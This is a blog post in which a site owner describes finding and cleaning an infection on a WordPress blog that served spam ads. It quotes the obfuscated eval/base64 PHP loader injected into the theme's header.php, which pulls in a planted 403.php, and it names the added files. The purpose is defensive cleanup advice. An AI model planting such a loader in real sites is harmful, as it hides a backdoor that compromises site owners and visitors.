My WordPress blog had been hacked. It displayed ads for stupid things in the far lower right corner of some blog pages. It looks like it displayed ads on just 1 in 10 of my pages, especially “Category” pages. You might want to take a peek on your own WordPress blog to make sure it hasn’t happened to you.
Here’s where the bad code was and how I fixed it.
The header.php file of my theme had been altered. It began:
<?define('USE_DIRA', '/blog/wp-content/themes/default/images/'); @eval(@base64_decode("ZnVuY3Rpb24gY2FsbGJhY2soJGNoZWUpe3JlcXVpcmUoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS5VU0VfRElSQS4iNDAzLnBocCIpO3JldHVybiAoJGNoZWUpO31vYl9zdGFydCgiY2FsbGJhY2siKTs="));?>
That code was obviously running code in my /blog/wp-content/themes/default/images/ directory.
Curiously, the “modified date” on the header.php file must have been hacked. I know this because the file has a “last modifed” date of April 2009, however the backup of my website in October 2010 doesn’t have the spamming code. Therefore, the hacked code must have been added more recently.
2 files had been added to the /blog/wp-content/themes/default/images/ directory on the blog:
Here are the most suspicious parts of 403.php
“SAPE” is a known malware (via)
You should never have any “eval base64” code in your WordPress installation. It’s almost always some piece of code trying to hide itself.
I removed the malicious code from my header.php and deleted 403.php and links.db from the default theme. Done.
Update: read the comments!